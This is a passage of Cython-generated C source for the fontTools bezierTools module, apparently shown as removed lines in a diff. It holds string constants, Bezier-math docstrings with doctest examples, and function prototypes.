-static const char __pyx_k_origDist[] = "origDist"; -static const char __pyx_k_pointAtT[] = "pointAtT"; -static const char __pyx_k_rectArea[] = "rectArea"; -static const char __pyx_k_sectRect[] = "sectRect"; -static const char __pyx_k_segments[] = "segments"; -static const char __pyx_k_TypeError[] = "TypeError"; -static const char __pyx_k_c11_range[] = "c11_range"; -static const char __pyx_k_c12_range[] = "c12_range"; -static const char __pyx_k_c21_range[] = "c21_range"; -static const char __pyx_k_c22_range[] = "c22_range"; -static const char __pyx_k_isenabled[] = "isenabled"; -static const char __pyx_k_precision[] = "precision"; -static const char __pyx_k_solutions[] = "solutions"; -static const char __pyx_k_splitLine[] = "splitLine"; -static const char __pyx_k_tolerance[] = "tolerance"; -static const char __pyx_k_translate[] = "translate"; -static const char __pyx_k_ValueError[] = "ValueError"; -static const char __pyx_k_calcBounds[] = "calcBounds"; -static const char __pyx_k_intersects[] = "intersects"; -static const char __pyx_k_namedtuple[] = 
"namedtuple"; -static const char __pyx_k_solveCubic[] = "solveCubic"; -static const char __pyx_k_splitCubic[] = "splitCubic"; -static const char __pyx_k_unique_key[] = "unique_key"; -static const char __pyx_k_ImportError[] = "ImportError"; -static const char __pyx_k_collections[] = "collections"; -static const char __pyx_k_pointFinder[] = "pointFinder"; -static const char __pyx_k_segmentrepr[] = "_segmentrepr"; -static const char __pyx_k_Intersection[] = "Intersection"; -static const char __pyx_k_curve_bounds[] = "_curve_bounds"; -static const char __pyx_k_initializing[] = "_initializing"; -static const char __pyx_k_isHorizontal[] = "isHorizontal"; -static const char __pyx_k_is_coroutine[] = "_is_coroutine"; -static const char __pyx_k_linePointAtT[] = "linePointAtT"; -static const char __pyx_k_line_t_of_pt[] = "_line_t_of_pt"; -static const char __pyx_k_aligned_curve[] = "aligned_curve"; -static const char __pyx_k_class_getitem[] = "__class_getitem__"; -static const char __pyx_k_cubicPointAtT[] = "cubicPointAtT"; -static const char __pyx_k_epsilonDigits[] = "epsilonDigits"; -static const char __pyx_k_intersections[] = "intersections"; -static const char __pyx_k_printSegments[] = "printSegments"; -static const char __pyx_k_splitCubicAtT[] = "_splitCubicAtT"; -static const char __pyx_k_unique_values[] = "unique_values"; -static const char __pyx_k_AttributeError[] = "AttributeError"; -static const char __pyx_k_cubicPointAtTC[] = "cubicPointAtTC"; -static const char __pyx_k_fontTools_misc[] = "fontTools.misc"; -static const char __pyx_k_solveQuadratic[] = "solveQuadratic"; -static const char __pyx_k_splitCubicAtTC[] = "splitCubicAtTC"; -static const char __pyx_k_splitQuadratic[] = "splitQuadratic"; -static const char __pyx_k_calcCubicBounds[] = "calcCubicBounds"; -static const char __pyx_k_calcCubicPoints[] = "calcCubicPoints"; -static const char __pyx_k_intersection_ts[] = "intersection_ts"; -static const char __pyx_k_segmentPointAtT[] = "segmentPointAtT"; -static 
const char __pyx_k_splitCubicAtT_2[] = "splitCubicAtT"; -static const char __pyx_k_transformPoints[] = "transformPoints"; -static const char __pyx_k_splitCubicAtTC_2[] = "_splitCubicAtTC"; -static const char __pyx_k_quadraticPointAtT[] = "quadraticPointAtT"; -static const char __pyx_k_splitQuadraticAtT[] = "_splitQuadraticAtT"; -static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; -static const char __pyx_k_calcCubicArcLength[] = "calcCubicArcLength"; -static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; -static const char __pyx_k_splitLine_line_450[] = "splitLine (line 450)"; -static const char __pyx_k_split_segment_at_t[] = "_split_segment_at_t"; -static const char __pyx_k_calcCubicArcLengthC[] = "calcCubicArcLengthC"; -static const char __pyx_k_calcCubicParameters[] = "calcCubicParameters"; -static const char __pyx_k_calcQuadraticBounds[] = "calcQuadraticBounds"; -static const char __pyx_k_calcQuadraticPoints[] = "calcQuadraticPoints"; -static const char __pyx_k_solveCubic_line_841[] = "solveCubic (line 841)"; -static const char __pyx_k_splitCubic_line_552[] = "splitCubic (line 552)"; -static const char __pyx_k_splitQuadraticAtT_2[] = "splitQuadraticAtT"; -static const char __pyx_k_Unknown_curve_degree[] = "Unknown curve degree"; -static const char __pyx_k_split_cubic_into_two[] = "_split_cubic_into_two"; -static const char __pyx_k_lineLineIntersections[] = "lineLineIntersections"; -static const char __pyx_k_segmentrepr_line_1449[] = "_segmentrepr (line 1449)"; -static const char __pyx_k_splitCubicIntoTwoAtTC[] = "splitCubicIntoTwoAtTC"; -static const char __pyx_k_calcQuadraticArcLength[] = "calcQuadraticArcLength"; -static const char __pyx_k_curveLineIntersections[] = "curveLineIntersections"; -static const char __pyx_k_splitCubicAtT_line_613[] = "splitCubicAtT (line 613)"; -static const char __pyx_k_calcQuadraticArcLengthC[] = "calcQuadraticArcLengthC"; -static const char __pyx_k_calcQuadraticParameters[] = 
"calcQuadraticParameters"; -static const char __pyx_k_curveCurveIntersections[] = "curveCurveIntersections"; -static const char __pyx_k_splitQuadratic_line_507[] = "splitQuadratic (line 507)"; -static const char __pyx_k_alignment_transformation[] = "_alignment_transformation"; -static const char __pyx_k_calcCubicBounds_line_412[] = "calcCubicBounds (line 412)"; -static const char __pyx_k_fontTools_misc_transform[] = "fontTools.misc.transform"; -static const char __pyx_k_approximateCubicArcLength[] = "approximateCubicArcLength"; -static const char __pyx_k_fontTools_misc_arrayTools[] = "fontTools.misc.arrayTools"; -static const char __pyx_k_splitCubic_locals_genexpr[] = "splitCubic..genexpr"; -static const char __pyx_k_approximateCubicArcLengthC[] = "approximateCubicArcLengthC"; -static const char __pyx_k_calcCubicArcLengthCRecurse[] = "_calcCubicArcLengthCRecurse"; -static const char __pyx_k_curve_line_intersections_t[] = "_curve_line_intersections_t"; -static const char __pyx_k_fontTools_misc_bezierTools[] = "fontTools.misc.bezierTools"; -static const char __pyx_k_segmentrepr_locals_genexpr[] = "_segmentrepr..genexpr"; -static const char __pyx_k_splitQuadraticAtT_line_589[] = "splitQuadraticAtT (line 589)"; -static const char __pyx_k_curve_curve_intersections_t[] = "_curve_curve_intersections_t"; -static const char __pyx_k_segmentSegmentIntersections[] = "segmentSegmentIntersections"; -static const char __pyx_k_calcQuadraticBounds_line_298[] = "calcQuadraticBounds (line 298)"; -static const char __pyx_k_approximateQuadraticArcLength[] = "approximateQuadraticArcLength"; -static const char __pyx_k_segmentrepr_1_2_3_2_3_4_0_1_2[] = "\n >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]])\n '(1, (2, 3), (), ((2, (3, 4), (0.1, 2.2))))'\n "; -static const char __pyx_k_splitQuadratic_locals_genexpr[] = "splitQuadratic..genexpr"; -static const char __pyx_k_approximateQuadraticArcLengthC[] = "approximateQuadraticArcLengthC"; -static const char 
__pyx_k_Approximates_the_arc_length_for[] = "Approximates the arc length for a cubic Bezier segment.\n\n Uses Gauss-Lobatto quadrature with n=5 points to approximate arc length.\n See :func:`calcCubicArcLength` for a slower but more accurate result.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n\n Returns:\n Arc length value.\n\n Example::\n\n >>> approximateCubicArcLength((0, 0), (25, 100), (75, 100), (100, 0))\n 190.04332968932817\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, 50), (100, 100))\n 154.8852074945903\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, 0), (150, 0)) # line; exact result should be 150.\n 149.99999999999991\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, 0), (-50, 0)) # cusp; exact result should be 150.\n 136.9267662156362\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, -50), (-50, 0)) # cusp\n 154.80848416537057\n "; -static const char __pyx_k_Calculates_the_arc_length_for_a[] = "Calculates the arc length for a quadratic Bezier segment.\n\n Args:\n pt1: Start point of the Bezier as 2D tuple.\n pt2: Handle point of the Bezier as 2D tuple.\n pt3: End point of the Bezier as 2D tuple.\n\n Returns:\n Arc length value.\n\n Example::\n\n >>> calcQuadraticArcLength((0, 0), (0, 0), (0, 0)) # empty segment\n 0.0\n >>> calcQuadraticArcLength((0, 0), (50, 0), (80, 0)) # collinear points\n 80.0\n >>> calcQuadraticArcLength((0, 0), (0, 50), (0, 80)) # collinear points vertical\n 80.0\n >>> calcQuadraticArcLength((0, 0), (50, 20), (100, 40)) # collinear points\n 107.70329614269008\n >>> calcQuadraticArcLength((0, 0), (0, 100), (100, 0))\n 154.02976155645263\n >>> calcQuadraticArcLength((0, 0), (0, 50), (100, 0))\n 120.21581243984076\n >>> calcQuadraticArcLength((0, 0), (50, -10), (80, 50))\n 102.53273816445825\n >>> calcQuadraticArcLength((0, 0), (40, 0), (-40, 0)) # collinear points, control point outside\n 66.66666666666667\n >>> calcQuadraticArcLength((0, 0), (40, 0), (0, 0)) # collinear points, 
looping back\n 40.0\n "; -static const char __pyx_k_Finds_intersections_between_two[] = "Finds intersections between two line segments.\n\n Args:\n s1, e1: Coordinates of the first line as 2D tuples.\n s2, e2: Coordinates of the second line as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n\n >>> a = lineLineIntersections( (310,389), (453, 222), (289, 251), (447, 367))\n >>> len(a)\n 1\n >>> intersection = a[0]\n >>> intersection.pt\n (374.44882952482897, 313.73458370177315)\n >>> (intersection.t1, intersection.t2)\n (0.45069111555824465, 0.5408153767394238)\n "; -static const char __pyx_k_Solve_a_cubic_equation_Solves_a[] = "Solve a cubic equation.\n\n Solves *a*x*x*x + b*x*x + c*x + d = 0* where a, b, c and d are real.\n\n Args:\n a: coefficient of *x\302\263*\n b: coefficient of *x\302\262*\n c: coefficient of *x*\n d: constant term\n\n Returns:\n A list of roots. Note that the returned list is neither guaranteed to\n be sorted nor to contain unique values!\n\n Examples::\n\n >>> solveCubic(1, 1, -6, 0)\n [-3.0, -0.0, 2.0]\n >>> solveCubic(-10.0, -9.0, 48.0, -29.0)\n [-2.9, 1.0, 1.0]\n >>> solveCubic(-9.875, -9.0, 47.625, -28.75)\n [-2.911392, 1.0, 1.0]\n >>> solveCubic(1.0, -4.5, 6.75, -3.375)\n [1.5, 1.5, 1.5]\n >>> solveCubic(-12.0, 18.0, -9.0, 1.50023651123)\n [0.5, 0.5, 0.5]\n >>> solveCubic(\n ... 9.0, 0.0, 0.0, -7.62939453125e-05\n ... ) == [-0.0, -0.0, -0.0]\n True\n "; -static const char __pyx_k_Split_a_cubic_Bezier_curve_at_a[] = "Split a cubic Bezier curve at a given coordinate.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n where: Position at which to split the curve.\n isHorizontal: Direction of the ray splitting the curve. 
If true,\n ``where`` is interpreted as a Y coordinate; if false, then\n ``where`` is interpreted as an X coordinate.\n\n Returns:\n A list of two curve segments (each curve segment being four 2D tuples)\n if the curve was successfully split, or a list containing the original\n curve.\n\n Example::\n\n >>> printSegments(splitCubic((0, 0), (25, 100), (75, 100), (100, 0), 150, False))\n ((0, 0), (25, 100), (75, 100), (100, 0))\n >>> printSegments(splitCubic((0, 0), (25, 100), (75, 100), (100, 0), 50, False))\n ((0, 0), (12.5, 50), (31.25, 75), (50, 75))\n ((50, 75), (68.75, 75), (87.5, 50), (100, 0))\n >>> printSegments(splitCubic((0, 0), (25, 100), (75, 100), (100, 0), 25, True))\n ((0, 0), (2.29379, 9.17517), (4.79804, 17.5085), (7.47414, 25))\n ((7.47414, 25), (31.2886, 91.6667), (68.7114, 91.6667), (92.5259, 25))\n ((92.5259, 25), (95.202, 17.5085), (97.7062, 9.17517), (100, 1.77636e-15))\n "; -static const char __pyx_k_both_points_are_on_same_side_of[] = "_both_points_are_on_same_side_of_origin"; -static const char __pyx_k_calcQuadraticArcLength_line_151[] = "calcQuadraticArcLength (line 151)"; -static const char __pyx_k_curve_curve_intersections_t_loc[] = "_curve_curve_intersections_t..midpoint"; -static const char __pyx_k_curve_line_intersections_t_loca[] = "_curve_line_intersections_t..genexpr"; -static const char __pyx_k_lineLineIntersections_line_1147[] = "lineLineIntersections (line 1147)"; -static const char __pyx_k_Calculates_the_bounding_rectangl[] = "Calculates the bounding rectangle for a quadratic Bezier segment.\n\n Args:\n pt1: Start point of the Bezier as a 2D tuple.\n pt2: Handle point of the Bezier as a 2D tuple.\n pt3: End point of the Bezier as a 2D tuple.\n\n Returns:\n A four-item tuple representing the bounding rectangle ``(xMin, yMin, xMax, yMax)``.\n\n Example::\n\n >>> calcQuadraticBounds((0, 0), (50, 100), (100, 0))\n (0, 0, 100, 50.0)\n >>> calcQuadraticBounds((0, 0), (100, 0), (100, 100))\n (0.0, 0.0, 100, 100)\n "; -static const char 
__pyx_k_Couldn_t_work_out_which_intersec[] = "Couldn't work out which intersection function to use"; -static const char __pyx_k_Finds_intersections_between_a_cu[] = "Finds intersections between a curve and a line.\n\n Args:\n curve: List of coordinates of the curve segment as 2D tuples.\n line: List of coordinates of the line segment as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n >>> curve = [ (100, 240), (30, 60), (210, 230), (160, 30) ]\n >>> line = [ (25, 260), (230, 20) ]\n >>> intersections = curveLineIntersections(curve, line)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (84.9000930760723, 189.87306176459828)\n "; -static const char __pyx_k_Lib_fontTools_misc_bezierTools_p[] = "Lib/fontTools/misc/bezierTools.py"; -static const char __pyx_k_Split_a_cubic_Bezier_curve_at_on[] = "Split a cubic Bezier curve at one or more values of t.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n *ts: Positions at which to split the curve.\n\n Returns:\n A list of curve segments (each curve segment being four 2D tuples).\n\n Examples::\n\n >>> printSegments(splitCubicAtT((0, 0), (25, 100), (75, 100), (100, 0), 0.5))\n ((0, 0), (12.5, 50), (31.25, 75), (50, 75))\n ((50, 75), (68.75, 75), (87.5, 50), (100, 0))\n >>> printSegments(splitCubicAtT((0, 0), (25, 100), (75, 100), (100, 0), 0.5, 0.75))\n ((0, 0), (12.5, 50), (31.25, 75), (50, 75))\n ((50, 75), (59.375, 75), (68.75, 68.75), (77.3438, 56.25))\n ((77.3438, 56.25), (85.9375, 43.75), (93.75, 25), (100, 0))\n "; -static const char __pyx_k_Split_a_line_at_a_given_coordina[] = "Split a line at a given coordinate.\n\n Args:\n pt1: Start point of line as 2D tuple.\n pt2: End point of line as 2D tuple.\n where: Position at which to split the line.\n isHorizontal: Direction of the ray splitting the line. 
If true,\n ``where`` is interpreted as a Y coordinate; if false, then\n ``where`` is interpreted as an X coordinate.\n\n Returns:\n A list of two line segments (each line segment being two 2D tuples)\n if the line was successfully split, or a list containing the original\n line.\n\n Example::\n\n >>> printSegments(splitLine((0, 0), (100, 100), 50, True))\n ((0, 0), (50, 50))\n ((50, 50), (100, 100))\n >>> printSegments(splitLine((0, 0), (100, 100), 100, True))\n ((0, 0), (100, 100))\n >>> printSegments(splitLine((0, 0), (100, 100), 0, True))\n ((0, 0), (0, 0))\n ((0, 0), (100, 100))\n >>> printSegments(splitLine((0, 0), (100, 100), 0, False))\n ((0, 0), (0, 0))\n ((0, 0), (100, 100))\n >>> printSegments(splitLine((100, 0), (0, 0), 50, False))\n ((100, 0), (50, 0))\n ((50, 0), (0, 0))\n >>> printSegments(splitLine((0, 100), (0, 0), 50, True))\n ((0, 100), (0, 50))\n ((0, 50), (0, 0))\n "; -static const char __pyx_k_Split_a_quadratic_Bezier_curve_a[] = "Split a quadratic Bezier curve at a given coordinate.\n\n Args:\n pt1,pt2,pt3: Control points of the Bezier as 2D tuples.\n where: Position at which to split the curve.\n isHorizontal: Direction of the ray splitting the curve. 
If true,\n ``where`` is interpreted as a Y coordinate; if false, then\n ``where`` is interpreted as an X coordinate.\n\n Returns:\n A list of two curve segments (each curve segment being three 2D tuples)\n if the curve was successfully split, or a list containing the original\n curve.\n\n Example::\n\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 150, False))\n ((0, 0), (50, 100), (100, 0))\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 50, False))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (75, 50), (100, 0))\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 25, False))\n ((0, 0), (12.5, 25), (25, 37.5))\n ((25, 37.5), (62.5, 75), (100, 0))\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 25, True))\n ((0, 0), (7.32233, 14.6447), (14.6447, 25))\n ((14.6447, 25), (50, 75), (85.3553, 25))\n ((85.3553, 25), (92.6777, 14.6447), (100, -7.10543e-15))\n >>> # XXX I'm not at all sure if the following behavior is desirable:\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 50, True))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (50, 50), (50, 50))\n ((50, 50), (75, 50), (100, 0))\n "; -static const char __pyx_k_approximateCubicArcLength_line_3[] = "approximateCubicArcLength (line 332)"; -static const char __pyx_k_curveCurveIntersections_line_137[] = "curveCurveIntersections (line 1373)"; -static const char __pyx_k_curveLineIntersections_line_1248[] = "curveLineIntersections (line 1248)"; -static const char __pyx_k_fontTools_misc_bezierTools_py_to[] = "fontTools.misc.bezierTools.py -- tools for working with Bezier path segments.\n"; -static const char __pyx_k_segmentSegmentIntersections_line[] = "segmentSegmentIntersections (line 1401)"; -static const char __pyx_k_Finds_intersections_between_two_2[] = "Finds intersections between two segments.\n\n Args:\n seg1: List of coordinates of the first segment as 2D tuples.\n seg2: List of coordinates of the second segment as 2D tuples.\n\n Returns:\n A 
list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n >>> curve1 = [ (10,100), (90,30), (40,140), (220,220) ]\n >>> curve2 = [ (5,150), (180,20), (80,250), (210,190) ]\n >>> intersections = segmentSegmentIntersections(curve1, curve2)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (81.7831487395506, 109.88904552375288)\n >>> curve3 = [ (100, 240), (30, 60), (210, 230), (160, 30) ]\n >>> line = [ (25, 260), (230, 20) ]\n >>> intersections = segmentSegmentIntersections(curve3, line)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (84.9000930760723, 189.87306176459828)\n\n "; -static const char __pyx_k_curve_curve_intersections_t_loc_2[] = "_curve_curve_intersections_t.."; -static const char __pyx_k_Calculates_the_bounding_rectangl_2[] = "Calculates the bounding rectangle for a quadratic Bezier segment.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n\n Returns:\n A four-item tuple representing the bounding rectangle ``(xMin, yMin, xMax, yMax)``.\n\n Example::\n\n >>> calcCubicBounds((0, 0), (25, 100), (75, 100), (100, 0))\n (0, 0, 100, 75.0)\n >>> calcCubicBounds((0, 0), (50, 0), (100, 50), (100, 100))\n (0.0, 0.0, 100, 100)\n >>> print(\"%f %f %f %f\" % calcCubicBounds((50, 0), (0, 100), (100, 100), (50, 0)))\n 35.566243 0.000000 64.433757 75.000000\n "; -static const char __pyx_k_Finds_intersections_between_a_cu_2[] = "Finds intersections between a curve and a curve.\n\n Args:\n curve1: List of coordinates of the first curve segment as 2D tuples.\n curve2: List of coordinates of the second curve segment as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n >>> curve1 = [ (10,100), 
(90,30), (40,140), (220,220) ]\n >>> curve2 = [ (5,150), (180,20), (80,250), (210,190) ]\n >>> intersections = curveCurveIntersections(curve1, curve2)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (81.7831487395506, 109.88904552375288)\n "; -static const char __pyx_k_Split_a_quadratic_Bezier_curve_a_2[] = "Split a quadratic Bezier curve at one or more values of t.\n\n Args:\n pt1,pt2,pt3: Control points of the Bezier as 2D tuples.\n *ts: Positions at which to split the curve.\n\n Returns:\n A list of curve segments (each curve segment being three 2D tuples).\n\n Examples::\n\n >>> printSegments(splitQuadraticAtT((0, 0), (50, 100), (100, 0), 0.5))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (75, 50), (100, 0))\n >>> printSegments(splitQuadraticAtT((0, 0), (50, 100), (100, 0), 0.5, 0.75))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (62.5, 50), (75, 37.5))\n ((75, 37.5), (87.5, 25), (100, 0))\n "; -/* #### Code section: decls ### */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_calcCubicArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_tolerance); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_2_split_cubic_into_two(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_p0, PyObject *__pyx_v_p1, PyObject *__pyx_v_p2, PyObject *__pyx_v_p3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_4_calcCubicArcLengthCRecurse(CYTHON_UNUSED PyObject *__pyx_self, double __pyx_v_mult, __pyx_t_double_complex __pyx_v_p0, __pyx_t_double_complex __pyx_v_p1, __pyx_t_double_complex __pyx_v_p2, __pyx_t_double_complex __pyx_v_p3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_6calcCubicArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, double 
__pyx_v_tolerance); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_8calcQuadraticArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_10calcQuadraticArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_12approximateQuadraticArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_14approximateQuadraticArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_16calcQuadraticBounds(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_18approximateCubicArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_20approximateCubicArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_22calcCubicBounds(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_24splitLine(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject 
*__pyx_v_pt2, PyObject *__pyx_v_where, PyObject *__pyx_v_isHorizontal); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_14splitQuadratic_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_26splitQuadratic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_where, PyObject *__pyx_v_isHorizontal); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_10splitCubic_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_28splitCubic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_where, PyObject *__pyx_v_isHorizontal); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_30splitQuadraticAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_32splitCubicAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_34splitCubicAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_37splitCubicIntoTwoAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, double __pyx_v_t); /* proto */ -static PyObject 
*__pyx_pf_9fontTools_4misc_11bezierTools_39_splitQuadraticAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_41_splitCubicAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_43_splitCubicAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_a, __pyx_t_double_complex __pyx_v_b, __pyx_t_double_complex __pyx_v_c, __pyx_t_double_complex __pyx_v_d, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_94__defaults__(CYTHON_UNUSED PyObject *__pyx_self); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_46solveQuadratic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_sqrt); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_48solveCubic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_50calcQuadraticParameters(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_52calcCubicParameters(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_54calcQuadraticPoints(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_56calcCubicPoints(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, 
